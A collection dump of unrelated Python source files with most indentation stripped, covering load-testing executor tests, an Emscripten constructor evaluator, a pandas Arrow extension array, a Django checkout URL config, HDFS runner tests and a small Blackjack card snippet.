self.obj.install_required_tools()
for driver in self.obj.webdrivers:
self.obj.env.add_path({"PATH": driver.get_dir()})
self.obj.create_runner()
self.obj.runner._check_tools = lambda *args: None
self.obj.runner._compile_scripts = lambda: None
tmp_tool = bzt.modules._apiritif.executor.Apiritif
try:
bzt.modules._apiritif.executor.Apiritif = MockPythonTool
bzt.modules._selenium.Selenium.version = "3"
self.obj.runner.prepare()
finally:
bzt.modules._apiritif.executor.Apiritif = tmp_tool
self.obj.script = self.obj.runner.script
def test_empty_scenario(self):
"""
Raise runtime error when no scenario provided
:return:
"""
self.configure({EXEC: {"executor": "selenium"}})
self.assertRaises(TaurusConfigError, self.obj_prepare)
def test_various_raise(self):
self.configure({ # RuntimeError when
EXEC: [{ # compilation fails
"executor": "selenium",
"scenario": {"script": RESOURCES_DIR + "selenium/invalid/invalid.java"}
}, { # no files of known types were found.
"executor": "selenium",
"scenario": {"script": RESOURCES_DIR + "selenium/invalid/not_found"}
}]})
self.assertRaises(ToolError, self.obj_prepare)
def test_empty_test_methods(self):
self.configure({ # Test exact number of tests when
EXEC: [{ # java annotations used
"executor": "selenium",
"scenario": {"script": RESOURCES_DIR + "selenium/invalid/SeleniumTest.java"}
}, { # test class extends JUnit TestCase
"executor": "selenium",
"scenario": {"script": RESOURCES_DIR + "selenium/invalid/SimpleTest.java"}
}, { # annotations used and no "test" in class name
"executor": "selenium",
"scenario": {"script": RESOURCES_DIR + "selenium/invalid/selenium1.java"}
}]})
self.obj_prepare_runner()
def test_from_extension(self):
self.configure(yaml.full_load(open(RESOURCES_DIR + "yaml/selenium_from_extension.yml").read()))
self.obj_prepare()
self.obj.get_widget()
self.obj.engine.start_subprocess = lambda **kwargs: None
self.obj.startup()
self.obj.post_process()
def test_requests(self):
self.configure(yaml.full_load(open(RESOURCES_DIR + "yaml/selenium_executor_requests.yml").read()))
self.obj_prepare()
self.obj.get_widget()
self.obj.engine.start_subprocess = lambda **kwargs: None
self.obj.startup()
self.obj.post_process()
def test_fail_on_zero_results(self):
self.configure(yaml.full_load(open(RESOURCES_DIR + "yaml/selenium_executor_requests.yml").read()))
self.obj_prepare()
self.obj.engine.prepared = [self.obj]
self.obj.engine.started = [self.obj]
prov = Local()
prov.engine = self.obj.engine
prov.executors = [self.obj]
prov.started_modules = [self.obj]
self.obj.engine.provisioning = prov
self.assertRaises(ToolError, self.obj.engine.provisioning.post_process)
def test_aremote_prov_requests(self):
self.obj.execution.merge({
"scenario": {
"requests": [
"http://blazedemo.com"]}})
resources = self.obj.resource_files()
self.assertEqual(0, len(resources))
def test_dont_copy_local_script_to_artifacts(self):
filename = "BlazeDemo.java" # ensures that .java file is not copied into artifacts-dir
script_path = RESOURCES_DIR + "" + filename
self.obj.execution.merge({
"scenario": {
"script": script_path,
}
})
files = self.obj.resource_files()
self.obj_prepare_runner()
self.assertIn(script_path, files)
artifacts_script = os.path.join(self.obj.engine.artifacts_dir, filename)
self.assertFalse(os.path.exists(artifacts_script))
def test_take_script_from_artifacts(self):
"""ensures that executor looks for script in artifacts-dir (for cloud/remote cases)"""
self.obj.engine.file_search_paths = [self.obj.engine.artifacts_dir]
script_name = "BlazeDemo.java"
test_script = RESOURCES_DIR + "" + script_name
artifacts_script = os.path.join(self.obj.engine.artifacts_dir, script_name)
shutil.copy2(test_script, artifacts_script)
self.obj.execution.merge({
"scenario": {
"script": script_name,
}
})
self.obj_prepare_runner()
def test_do_not_modify_scenario_script(self):
self.obj.execution.merge({
"scenario": {
"requests": ["address"],
}
})
self.obj_prepare()
self.assertNotIn("script", self.obj.get_scenario())
def test_default_address_gen(self):
self.obj.execution.merge({
"scenario": {
"default-address": "http://blazedemo.com",
"requests": ["/", "http://absolute.address.com/somepage", "/reserve.php"],
}
})
self.obj_prepare()
with open(os.path.join(self.obj.engine.artifacts_dir, os.path.basename(self.obj.script))) as fds:
script = fds.read()
urls = re.findall(r"\.get\('(.+)'\)", script)
self.assertEqual("http://blazedemo.com/", urls[0])
self.assertEqual("http://absolute.address.com/somepage", urls[1])
self.assertEqual("http://blazedemo.com/reserve.php", urls[2])
def test_force_runner(self):
self.obj.execution.merge({
'scenario': {'script': RESOURCES_DIR + 'selenium/junit/jar/'},
'runner': 'apiritif',
})
self.obj_prepare()
self.assertIsInstance(self.obj.runner, ApiritifNoseExecutor)
def test_additional_classpath_resource_files(self):
self.obj.execution.merge({
'scenario': {
'script': RESOURCES_DIR + 'selenium/junit/jar/dummy.jar',
'runner': 'junit',
'additional-classpath': [RESOURCES_DIR + 'selenium/junit/jar/another_dummy.jar']}})
self.obj.engine.config.merge({
'modules': {
'junit': {
'additional-classpath': [RESOURCES_DIR + 'selenium/testng/jars/testng-suite.jar']}}})
own_resources = self.obj.resource_files()
all_resources = list(set(self.obj.get_resource_files()))
# scenario.script, scenario.additional-classpath, settings.additional-classpath
self.assertEqual(len(own_resources), 2)
self.assertEqual(len(all_resources), 3)
def test_add_env_path(self):
path1 = os.path.join("foo", "bar")
path2 = os.path.join("bar", "baz")
self.obj.env.add_path({"PATH": path1})
self.obj.env.add_path({"PATH": path2})
self.assertIn(path1, self.obj.env.get("PATH"))
self.assertIn(path2, self.obj.env.get("PATH"))
def test_subscribe_to_transactions(self):
dummy = DummyListener()
self.configure({
'execution': {
"iterations": 5,
'scenario': {'script': RESOURCES_DIR + 'selenium/python/test_selenium_transactions.py'},
'executor': 'selenium'
},
})
self.obj_prepare_runner()
self.obj.subscribe_to_transactions(dummy)
try:
self.obj.engine.start_subprocess = self.start_subprocess
self.obj.startup()
fake_out = os.path.join(RESOURCES_DIR, 'apiritif/dummy-output.out')
self.obj.runner._tailer = FileReader(filename=fake_out, parent_logger=self.log)
finally:
self.obj.shutdown()
self.obj.post_process()
self.assertEqual(10, dummy.transactions['hello there'])
class TestReportReader(BZTestCase):
def test_report_reader(self):
reader = LoadSamplesReader(RESOURCES_DIR + "selenium/report.ldjson", ROOT_LOGGER)
items = list(reader._read(last_pass=True))
self.assertEqual(4, len(items))
self.assertEqual(items[0][1], 'testFailure')
self.assertEqual(items[0][6], '400')
self.assertEqual(items[1][1], 'testBroken')
self.assertEqual(items[1][6], '500')
self.assertEqual(items[2][1], 'testSuccess')
self.assertEqual(items[2][6], '200')
self.assertEqual(items[3][1], 'testUnexp')
self.assertEqual(items[3][6], 'UNKNOWN')
def test_reader_buffering(self):
first_part = b'{"a": 1, "b": 2}\n{"a": 2,'
second_part = b'"b": 3}\n{"a": 3, "b": 4}\n'
reader = LDJSONReader("yip", ROOT_LOGGER)
buffer = BytesIO(first_part)
reader.file.fds = buffer
reader.file.fds.name = "yip"
items = list(reader.read(last_pass=False))
self.assertEqual(len(items), 1)
buffer.write(second_part)
items = list(reader.read(last_pass=False))
self.assertEqual(len(items), 2)
def test_func_reader(self):
reader = FuncSamplesReader(RESOURCES_DIR + "selenium/report.ldjson", EngineEmul(), ROOT_LOGGER)
items = list(reader.read(last_pass=True))
self.assertEqual(5, len(items))
self.assertEqual(items[0].test_case, 'testFailure')
self.assertEqual(items[0].status, "FAILED")
self.assertEqual(items[1].test_case, 'testBroken')
self.assertEqual(items[1].status, "BROKEN")
self.assertEqual(items[2].test_case, 'testSuccess')
self.assertEqual(items[2].status, "PASSED")
self.assertEqual(items[4].test_case, 'SkippedTest')
self.assertEqual(items[4].status, "SKIPPED")
|
py | 1a330a7ca925edb5c4efecfbc09bff46fa1f633e | #!/usr/bin/env python3
# Copyright 2016 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
"""Tries to evaluate global constructors, applying their effects ahead of time.
This is an LTO-like operation, and to avoid parsing the entire tree (we might
fail to parse a massive project), we operate on the text in Python.
"""
import logging
import os
import subprocess
import sys
__scriptdir__ = os.path.dirname(os.path.abspath(__file__))
__rootdir__ = os.path.dirname(__scriptdir__)
sys.path.append(__rootdir__)
from tools import utils
js_file = sys.argv[1]
binary_file = sys.argv[2] # mem init for js, wasm binary for wasm
total_memory = int(sys.argv[3])
total_stack = int(sys.argv[4])
global_base = int(sys.argv[5])
binaryen_bin = sys.argv[6]
debug_info = int(sys.argv[7])
extra_args = sys.argv[8:]
wasm = bool(binaryen_bin)
assert global_base > 0
logger = logging.getLogger('ctor_evaller')
# helpers
def find_ctors(js):
ctors_start = js.find('__ATINIT__.push(')
if ctors_start < 0:
return (-1, -1)
ctors_end = js.find(');', ctors_start)
assert ctors_end > 0
ctors_end += 3
return (ctors_start, ctors_end)
def find_ctors_data(js, num):
ctors_start, ctors_end = find_ctors(js)
assert ctors_start > 0
ctors_text = js[ctors_start:ctors_end]
all_ctors = [ctor for ctor in ctors_text.split(' ') if ctor.endswith('()') and not ctor == 'function()' and '.' not in ctor]
all_ctors = [ctor.replace('()', '') for ctor in all_ctors]
assert all(ctor.startswith('_') for ctor in all_ctors)
all_ctors = [ctor[1:] for ctor in all_ctors]
assert len(all_ctors)
ctors = all_ctors[:num]
return ctors_start, ctors_end, all_ctors, ctors
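# Illustrative example (not taken from an actual build) of what find_ctors_data
# extracts. Given JS containing
#   __ATINIT__.push({ func: function() { __GLOBAL__I_000101() } });
# the ctor list, with the JS-side leading underscore stripped, would be
# ['_GLOBAL__I_000101'], and eval_ctors() forwards the first `num` entries to
# wasm-ctor-eval via --ctors=.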
def eval_ctors(js, wasm_file, num):
ctors_start, ctors_end, all_ctors, ctors = find_ctors_data(js, num)
cmd = [os.path.join(binaryen_bin, 'wasm-ctor-eval'), wasm_file, '-o', wasm_file, '--ctors=' + ','.join(ctors)]
cmd += extra_args
if debug_info:
cmd += ['-g']
logger.debug('wasm ctor cmd: ' + str(cmd))
try:
    # wasm-ctor-eval reports its successes on stderr
    err = subprocess.run(cmd, stderr=subprocess.PIPE, timeout=10, universal_newlines=True).stderr
except subprocess.TimeoutExpired:
logger.debug('ctors timed out\n')
return 0, js
num_successful = err.count('success on')
logger.debug(err)
if len(ctors) == num_successful:
new_ctors = ''
else:
elements = []
for ctor in all_ctors[num_successful:]:
elements.append('{ func: function() { %s() } }' % ctor)
new_ctors = '__ATINIT__.push(' + ', '.join(elements) + ');'
js = js[:ctors_start] + new_ctors + js[ctors_end:]
return num_successful, js
# main
def main():
js = utils.read_file(js_file)
ctors_start, ctors_end = find_ctors(js)
if ctors_start < 0:
logger.debug('ctor_evaller: no ctors')
sys.exit(0)
ctors_text = js[ctors_start:ctors_end]
if ctors_text.count('(') == 1:
logger.debug('ctor_evaller: push, but no ctors')
sys.exit(0)
num_ctors = ctors_text.count('function()')
logger.debug('ctor_evaller: %d ctors, from |%s|' % (num_ctors, ctors_text))
wasm_file = binary_file
logger.debug('ctor_evaller (wasm): trying to eval %d global constructors' % num_ctors)
num_successful, new_js = eval_ctors(js, wasm_file, num_ctors)
if num_successful == 0:
logger.debug('ctor_evaller: not successful')
sys.exit(0)
logger.debug('ctor_evaller: we managed to remove %d ctors' % num_successful)
utils.write_file(js_file, new_js)
if __name__ == '__main__':
sys.exit(main())
|
py | 1a330af9d877334c4cadb6ab4a7592f1e922b4bf | import os
from ..brew_exts import (
build_env_statements,
DEFAULT_HOMEBREW_ROOT,
recipe_cellar_path,
)
from ..resolvers import Dependency, NullDependency
class UsesHomebrewMixin:
def _init_homebrew(self, **kwds):
cellar_root = kwds.get('cellar', None)
if cellar_root is None:
cellar_root = os.path.join(DEFAULT_HOMEBREW_ROOT, "Cellar")
self.cellar_root = cellar_root
    def _find_dep_versioned(self, name, version, exact=True):
recipe_path = recipe_cellar_path(self.cellar_root, name, version)
if not os.path.exists(recipe_path) or not os.path.isdir(recipe_path):
return NullDependency(version=version, name=name)
commands = build_env_statements(self.cellar_root, recipe_path, relaxed=True)
        return HomebrewDependency(commands, exact=exact)
def _find_dep_default(self, name, version):
installed_versions = self._installed_versions(name)
if not installed_versions:
return NullDependency(version=version, name=name)
# Just grab newest installed version - may make sense some day to find
# the linked version instead.
default_version = sorted(installed_versions, reverse=True)[0]
return self._find_dep_versioned(name, default_version, exact=version is None)
def _installed_versions(self, recipe):
recipe_base_path = os.path.join(self.cellar_root, recipe)
if not os.path.exists(recipe_base_path):
return []
names = os.listdir(recipe_base_path)
return filter(lambda n: os.path.isdir(os.path.join(recipe_base_path, n)), names)
class UsesToolDependencyDirMixin:
def _init_base_path(self, dependency_manager, **kwds):
self.base_path = os.path.abspath( kwds.get('base_path', dependency_manager.default_base_path) )
class UsesInstalledRepositoriesMixin:
def _get_installed_dependency( self, name, type, version=None, **kwds ):
installed_tool_dependencies = kwds.get("installed_tool_dependencies", [])
for installed_tool_dependency in (installed_tool_dependencies or []):
name_and_type_equal = installed_tool_dependency.name == name and installed_tool_dependency.type == type
if version:
if name_and_type_equal and installed_tool_dependency.version == version:
return installed_tool_dependency
else:
if name_and_type_equal:
return installed_tool_dependency
return None
class HomebrewDependency(Dependency):
def __init__(self, commands, exact=True):
self.commands = commands
self._exact = exact
@property
def exact(self):
return self._exact
def shell_commands(self, requirement):
raw_commands = self.commands.replace("\n", ";")
return raw_commands
def __repr__(self):
return "PlatformBrewDependency[commands=%s]" % self.commands
|
py | 1a330b597d61ab527223f13a56aecfac95d4913e | """
Unit test each component in CADRE using some saved data from John's CMF implementation.
"""
import unittest
from parameterized import parameterized
import numpy as np
from openmdao.api import Problem
from CADRE.attitude import Attitude_Angular, Attitude_AngularRates, \
Attitude_Attitude, Attitude_Roll, Attitude_RotationMtx, \
Attitude_RotationMtxRates, Attitude_Sideslip, Attitude_Torque
from CADRE.battery import BatterySOC, BatteryPower, BatteryConstraints
from CADRE.comm import Comm_DataDownloaded, Comm_AntRotation, Comm_AntRotationMtx, \
Comm_BitRate, Comm_Distance, Comm_EarthsSpin, Comm_EarthsSpinMtx, Comm_GainPattern, \
Comm_GSposEarth, Comm_GSposECI, Comm_LOS, Comm_VectorAnt, Comm_VectorBody, \
Comm_VectorECI, Comm_VectorSpherical
from CADRE.orbit import Orbit_Dynamics # , Orbit_Initial
from CADRE.parameters import BsplineParameters
from CADRE.power import Power_CellVoltage, Power_SolarPower, Power_Total
from CADRE.reactionwheel import ReactionWheel_Motor, ReactionWheel_Power, \
ReactionWheel_Torque, ReactionWheel_Dynamics
from CADRE.solar import Solar_ExposedArea
from CADRE.sun import Sun_LOS, Sun_PositionBody, Sun_PositionECI, Sun_PositionSpherical
from CADRE.thermal_temperature import ThermalTemperature
from CADRE.test.util import load_validation_data
#
# component types to test
#
component_types = [
# from CADRE.attitude
Attitude_Angular, Attitude_AngularRates,
Attitude_Attitude, Attitude_Roll, Attitude_RotationMtx,
Attitude_RotationMtxRates, Attitude_Sideslip, Attitude_Torque,
# from CADRE.battery
BatterySOC, BatteryPower, BatteryConstraints,
# from CADRE.comm
Comm_DataDownloaded, Comm_AntRotation, Comm_AntRotationMtx,
Comm_BitRate, Comm_Distance, Comm_EarthsSpin, Comm_EarthsSpinMtx, Comm_GainPattern,
Comm_GSposEarth, Comm_GSposECI, Comm_LOS, Comm_VectorAnt, Comm_VectorBody,
Comm_VectorECI, Comm_VectorSpherical,
# from CADRE.orbit
Orbit_Dynamics, # Orbit_Initial was not recorded in John's pickle.
# from CADRE.parameters
BsplineParameters,
# from CADRE.power
Power_CellVoltage, Power_SolarPower, Power_Total,
# from CADRE.reactionwheel
ReactionWheel_Motor, ReactionWheel_Power,
ReactionWheel_Torque, ReactionWheel_Dynamics,
# from CADRE.solar
Solar_ExposedArea,
# from CADRE.sun
Sun_LOS, Sun_PositionBody, Sun_PositionECI, Sun_PositionSpherical,
# from CADRE.thermal_temperature
ThermalTemperature
]
#
# load saved data from John's CMF implementation.
#
n, m, h, setd = load_validation_data(idx='5')
class TestCADRE(unittest.TestCase):
@parameterized.expand([(_class.__name__, _class) for _class in component_types],
testcase_func_name=lambda f, n, p: 'test_' + p.args[0])
def test_component(self, name, comp_class):
try:
comp = comp_class(n)
except TypeError:
try:
comp = comp_class()
except TypeError:
comp = comp_class(n, 300)
self.assertTrue(isinstance(comp, comp_class),
'Could not create instance of %s' % comp_class.__name__)
prob = Problem(comp)
prob.setup()
prob.final_setup()
inputs = comp.list_inputs(out_stream=None)
outputs = comp.list_outputs(out_stream=None)
for var, meta in inputs:
if var in setd:
prob[var] = setd[var]
comp.h = h # some components need this
prob.run_model()
for var, meta in outputs:
if var in setd:
tval = setd[var]
assert(np.linalg.norm(tval - prob[var]) / np.linalg.norm(tval) < 1e-3), \
'%s: Expected\n%s\nbut got\n%s' % (var, str(tval), str(prob[var]))
if __name__ == "__main__":
unittest.main()
|
py | 1a330bb584ba55c6808920b273a8325eb7feeeff | """
Rudimentary Apache Arrow-backed ExtensionArray.
At the moment, just a boolean array / type is implemented.
Eventually, we'll want to parametrize the type and support
multiple dtypes. Not all methods are implemented yet, and the
current implementation is not efficient.
"""
from __future__ import annotations
import copy
import itertools
import operator
import numpy as np
import pyarrow as pa
from pandas._typing import type_t
import pandas as pd
from pandas.api.extensions import (
ExtensionArray,
ExtensionDtype,
register_extension_dtype,
take,
)
from pandas.api.types import is_scalar
from pandas.core.arraylike import OpsMixin
@register_extension_dtype
class ArrowBoolDtype(ExtensionDtype):
type = np.bool_
kind = "b"
name = "arrow_bool"
na_value = pa.NULL
@classmethod
def construct_array_type(cls) -> type_t[ArrowBoolArray]:
"""
Return the array type associated with this dtype.
Returns
-------
type
"""
return ArrowBoolArray
@property
def _is_boolean(self) -> bool:
return True
@register_extension_dtype
class ArrowStringDtype(ExtensionDtype):
type = str
kind = "U"
name = "arrow_string"
na_value = pa.NULL
@classmethod
def construct_array_type(cls) -> type_t[ArrowStringArray]:
"""
Return the array type associated with this dtype.
Returns
-------
type
"""
return ArrowStringArray
class ArrowExtensionArray(OpsMixin, ExtensionArray):
_data: pa.ChunkedArray
@classmethod
def from_scalars(cls, values):
arr = pa.chunked_array([pa.array(np.asarray(values))])
return cls(arr)
@classmethod
def from_array(cls, arr):
assert isinstance(arr, pa.Array)
return cls(pa.chunked_array([arr]))
@classmethod
def _from_sequence(cls, scalars, dtype=None, copy=False):
return cls.from_scalars(scalars)
def __repr__(self):
return f"{type(self).__name__}({repr(self._data)})"
def __getitem__(self, item):
if is_scalar(item):
return self._data.to_pandas()[item]
else:
vals = self._data.to_pandas()[item]
return type(self).from_scalars(vals)
def __len__(self):
return len(self._data)
def astype(self, dtype, copy=True):
# needed to fix this astype for the Series constructor.
if isinstance(dtype, type(self.dtype)) and dtype == self.dtype:
if copy:
return self.copy()
return self
return super().astype(dtype, copy)
@property
def dtype(self):
return self._dtype
def _logical_method(self, other, op):
if not isinstance(other, type(self)):
raise NotImplementedError()
result = op(np.array(self._data), np.array(other._data))
return ArrowBoolArray(
pa.chunked_array([pa.array(result, mask=pd.isna(self._data.to_pandas()))])
)
def __eq__(self, other):
if not isinstance(other, type(self)):
return False
return self._logical_method(other, operator.eq)
@property
def nbytes(self) -> int:
return sum(
x.size
for chunk in self._data.chunks
for x in chunk.buffers()
if x is not None
)
def isna(self):
nas = pd.isna(self._data.to_pandas())
return type(self).from_scalars(nas)
def take(self, indices, allow_fill=False, fill_value=None):
data = self._data.to_pandas()
if allow_fill and fill_value is None:
fill_value = self.dtype.na_value
result = take(data, indices, fill_value=fill_value, allow_fill=allow_fill)
return self._from_sequence(result, dtype=self.dtype)
def copy(self):
return type(self)(copy.copy(self._data))
@classmethod
def _concat_same_type(cls, to_concat):
chunks = list(itertools.chain.from_iterable(x._data.chunks for x in to_concat))
arr = pa.chunked_array(chunks)
return cls(arr)
def __invert__(self):
return type(self).from_scalars(~self._data.to_pandas())
def _reduce(self, name: str, *, skipna: bool = True, **kwargs):
if skipna:
arr = self[~self.isna()]
else:
arr = self
try:
op = getattr(arr, name)
except AttributeError as err:
raise TypeError from err
return op(**kwargs)
def any(self, axis=0, out=None):
# Explicitly return a plain bool to reproduce GH-34660
return bool(self._data.to_pandas().any())
def all(self, axis=0, out=None):
# Explicitly return a plain bool to reproduce GH-34660
return bool(self._data.to_pandas().all())
class ArrowBoolArray(ArrowExtensionArray):
def __init__(self, values):
if not isinstance(values, pa.ChunkedArray):
raise ValueError
assert values.type == pa.bool_()
self._data = values
self._dtype = ArrowBoolDtype()
class ArrowStringArray(ArrowExtensionArray):
def __init__(self, values):
if not isinstance(values, pa.ChunkedArray):
raise ValueError
assert values.type == pa.string()
self._data = values
self._dtype = ArrowStringDtype()
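# Illustrative usage sketch, not part of the original module: constructing the
# Arrow-backed boolean array and wrapping it in a pandas Series.
#
#   arr = ArrowBoolArray.from_scalars([True, False, True])
#   ser = pd.Series(arr)
#   ser.dtype      # -> arrow_bool
#   ser.any()      # -> True, dispatched through ArrowExtensionArray._reduce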
|
py | 1a330bbae5ec2f7a35dab35e0e869fad09401af4 | from django.conf.urls.defaults import patterns, url
from oscar.core.application import Application
from oscar.apps.checkout.views import IndexView, ShippingAddressView, UserAddressDeleteView, UserAddressCreateView, \
UserAddressUpdateView, ShippingMethodView, PaymentMethodView, OrderPreviewView, \
PaymentDetailsView, ThankYouView
class CheckoutApplication(Application):
name = 'checkout'
index_view = IndexView
shipping_address_view = ShippingAddressView
user_address_create_view = UserAddressCreateView
user_address_update_view = UserAddressUpdateView
user_address_delete_view = UserAddressDeleteView
shipping_method_view = ShippingMethodView
payment_method_view = PaymentMethodView
order_preview_view = OrderPreviewView
payment_details_view = PaymentDetailsView
thankyou_view = ThankYouView
def get_urls(self):
urlpatterns = patterns('',
url(r'^$', self.index_view.as_view(), name='index'),
# Shipping/user address views
url(r'shipping-address/$', self.shipping_address_view.as_view(), name='shipping-address'),
url(r'user-address/create/$', self.user_address_create_view.as_view(), name='user-address-create'),
url(r'user-address/edit/(?P<pk>\d+)/$', self.user_address_update_view.as_view(), name='user-address-update'),
url(r'user-address/delete/(?P<pk>\d+)/$', self.user_address_delete_view.as_view(), name='user-address-delete'),
# Shipping method views
url(r'shipping-method/$', self.shipping_method_view.as_view(), name='shipping-method'),
# Payment method views
url(r'payment-method/$', self.payment_method_view.as_view(), name='payment-method'),
url(r'preview/$', self.order_preview_view.as_view(), name='preview'),
url(r'payment-details/$', self.payment_details_view.as_view(), name='payment-details'),
url(r'thank-you/$', self.thankyou_view.as_view(), name='thank-you'),
)
return urlpatterns
application = CheckoutApplication() |
py | 1a330d1552358212bb085051a0200c67c3f2be9e | # # coding:utf-8
# pypy use TEA complex
# from ctypes import *
# # from boostpy import TEA
#
#
# class Tea(object):
# """tea encrypt"""
#
# def __init__(self, loop=16, key=None):
# """init Tea object
#
# @param loop: default is 16
# @param key: default is *******
# """
# self.tea = TEA(loop, key) if key else TEA(loop)
#
# def _group(self, seq, size):
# while seq:
# yield seq[:size]
# seq = seq[size:]
#
# def encrypt(self, content):
# # encrypt content
# encode = ""
# _input = create_string_buffer(8)
# str_list = list(self._group(content, 8))
# for aStr in str_list:
# _input.value = aStr
# encode += self.tea.encrypt(_input.value)
#
# with open(r"/var/tmp/log.txt", 'w+') as f:
# f.write(encode)
# return encode
#
# def decrypt(self, encode):
# # decrypt content
# decode = ""
# str_list = list(self._group(encode, 8))
# for aStr in str_list:
# decode += self.tea.decrypt(aStr).strip('\x00')
#
# with open(r"/var/tmp/log2.txt", 'w+') as f:
# f.write(decode)
# return decode
#
#
# if __name__ == "__main__":
# t = Tea()
# num = 1
# s = "HELLO WORLD"
# # encode = t.encrypt(s)
#
# for i in xrange(1000):
# import random
# s = random.sample('zyxwvutsrqponmlkjihgfedcba _~!@#$%^&*()+=-1234567890', 40)
# s2 = ''.join(s)
# s2.strip()
# # s2 = 'unban account ism5'
# s3 = t.decrypt(t.encrypt(s2))
# if s3 != s2:
# print num," before:", s2, "after:", s3
# num += 1
|
py | 1a330d1ca4e8120d63cfa455b1fdab08b44a1efe | # flake8: noqa
import unittest
import logging
from unittest.mock import MagicMock
import subprocess
import hdfs.hdfs_application_runner as runner
class TestHdfsApplicationRunner(unittest.TestCase):
def setUp(self):
self.spark = runner.SparkHdfsTestRunner(logging)
self.mrgen = runner.MrTeragenRunner(logging)
self.mrsort = runner.MrTerasortRunner(logging)
def test_correct_output_spark(self):
output = str.encode("spark.yarn.driver.memoryOverhead is set but does not apply in client mode.\n" +
"Iteration 1 took 3692 ms\nIteration 2 took 87 ms\nIteration 3 took 65 ms\n" +
"Iteration 4 took 64 ms\nIteration 5 took 56 ms\nIteration 6 took 74 ms\n" +
"Iteration 7 took 60 ms\nIteration 8 took 60 ms\nIteration 9 took 51 ms\n" +
"Iteration 10 took 52 ms\n")
process = MagicMock(spec=subprocess.CompletedProcess, args=["test"], returncode=0, stdout=output, stderr=b'')
self.spark._check_output(process.stdout, process.stderr)
def test_error_on_wrong_output_spark(self):
output = str.encode("spark.yarn.driver.memoryOverhead is set but does not apply in client mode." +
"\nPi is roughly 2.1415471415471417")
process = MagicMock(spec=subprocess.CompletedProcess, args=["test"], returncode=21, stdout=output, stderr=b'')
with self.assertRaises(runner.SparkRequestError):
self.spark._check_output(process.stdout, process.stderr)
def test_error_on_wrong_output_spark_with_not_enough_iterations(self):
output = str.encode("spark.yarn.driver.memoryOverhead is set but does not apply in client mode.\n" +
"Iteration 1 took 3692 ms\n" +
"Iteration 4 took 64 ms\nIteration 5 took 56 ms\nIteration 6 took 74 ms\n" +
"Iteration 7 took 60 ms\nIteration 8 took 60 ms\nIteration 9 took 51 ms\n" +
"Iteration 10 took 52 ms\n")
process = MagicMock(spec=subprocess.CompletedProcess, args=["test"], returncode=21, stdout=output, stderr=b'')
with self.assertRaises(runner.SparkRequestError):
self.spark._check_output(process.stdout, process.stderr)
def test_correct_output_mr(self):
output = str.encode("""
17/02/23 11:24:07 INFO client.ConfiguredRMFailoverProxyProvider: Failing over to rm2
17/02/23 11:24:08 INFO mapreduce.JobSubmitter: number of splits:2
17/02/23 11:24:08 INFO mapreduce.JobSubmitter: Submitting tokens for job: job_1768772602026_0001
17/02/23 11:24:08 INFO mapreduce.JobSubmitter: Kind: HDFS_DELEGATION_TOKEN, Service: ha-hdfs:sndbx, Ident: (HDFS_DELEGATION_TOKEN token 1086442 for smoketest)
17/02/23 11:24:09 INFO impl.YarnClientImpl: Submitted application application_1768772602026_0001
17/02/23 11:24:09 INFO mapreduce.Job: The url to track the job: http://sandbox.hortonworks.com:8088/proxy/application_1768772602026_0001/
17/02/23 11:24:09 INFO mapreduce.Job: Running job: job_1768772602026_0001
17/02/23 11:24:24 INFO mapreduce.Job: Job job_1768772602026_0001 running in uber mode : false
17/02/23 11:24:24 INFO mapreduce.Job: map 0% reduce 0%
17/02/23 11:24:40 INFO mapreduce.Job: map 50% reduce 0%
17/02/23 11:24:50 INFO mapreduce.Job: map 100% reduce 0%
17/02/23 11:24:55 INFO mapreduce.Job: map 100% reduce 100%
17/02/23 11:24:55 INFO mapreduce.Job: Job job_1768772602026_0001 completed successfully
17/02/23 11:24:55 INFO mapreduce.Job: Counters: 50
\tFile System Counters
\t\tFILE: Number of bytes read=52000006
\t\tFILE: Number of bytes written=104468578
\t\tFILE: Number of read operations=0
\t\tHDFS: Number of write operations=2
""")
process = MagicMock(spec=subprocess.CompletedProcess, args=["test"], returncode=0, stdout=b'', stderr=output)
self.mrgen._check_output(process.stdout, process.stderr)
self.mrsort._check_output(process.stdout, process.stderr)
def test_error_on_wrong_output_mr(self):
output = str.encode("""
17/02/23 11:24:07 INFO client.ConfiguredRMFailoverProxyProvider: Failing over to rm2
17/02/23 11:24:08 INFO mapreduce.JobSubmitter: number of splits:2
17/02/23 11:24:08 INFO mapreduce.JobSubmitter: Submitting tokens for job: job_1768772602026_0001
17/02/23 11:24:08 INFO mapreduce.JobSubmitter: Kind: HDFS_DELEGATION_TOKEN, Service: ha-hdfs:sndbx, Ident: (HDFS_DELEGATION_TOKEN token 1086442 for smoketest)
17/02/23 11:24:09 INFO impl.YarnClientImpl: Submitted application application_1768772602026_0001
17/02/23 11:24:09 INFO mapreduce.Job: The url to track the job: http://sandbox.hortonworks.com:8088/proxy/application_1768772602026_0001/
17/02/23 11:24:09 INFO mapreduce.Job: Running job: job_1768772602026_0001
17/02/23 11:24:24 INFO mapreduce.Job: Job job_1768772602026_0001 running in uber mode : false
17/02/23 11:24:24 INFO mapreduce.Job: map 0% reduce 0%
17/02/23 11:24:40 INFO mapreduce.Job: map 50% reduce 0%
17/02/23 11:24:50 INFO mapreduce.Job: map 100% reduce 0%
17/02/23 11:24:55 INFO mapreduce.Job: map 100% reduce 100%
17/02/23 11:24:55 INFO mapreduce.Job: Job job_1768772602026_0001 FAILED
17/02/23 11:24:55 INFO mapreduce.Job: Counters: 49
""")
process = MagicMock(spec=subprocess.CompletedProcess, args=["test"], returncode=21, stdout=b'', stderr=output)
with self.assertRaises(runner.MrRequestError):
self.mrgen._check_output(process.stdout, process.stderr)
self.mrsort._check_output(process.stdout, process.stderr)
|
py | 1a330e25592716cd17cc6d4e8f6c67b9a5f743b1 |
def prepare_tls(config_dict):
config_dict['internal_tls'].prepare()
config_dict['internal_tls'].validate() |
py | 1a330f84b40dbee3cde047e9e049134b7c67853d | from warnings import warn
class ReadabilityException(Exception):
pass
def minimum_words_warning():
warn('100 words required for optimal accuracy.') |
py | 1a330fc4db4ea4183375f021473de06dfaaee8c8 | from random import choice, sample
cartas = {
chr(0x1f0a1): 11,
chr(0x1f0a2): 2,
chr(0x1f0a3): 3,
chr(0x1f0a4): 4,
chr(0x1f0a5): 5,
chr(0x1f0a6): 6,
chr(0x1f0a7): 7,
chr(0x1f0a8): 8,
chr(0x1f0a9): 9,
chr(0x1f0aa): 10,
chr(0x1f0ab): 10,
chr(0x1f0ad): 10,
chr(0x1f0ae): 10,
}
for carta, valor in cartas.items():
print("la carta {} vale {}".format(carta, valor))
print("Empieza el Black Jack")
lista_cartas = list(cartas)
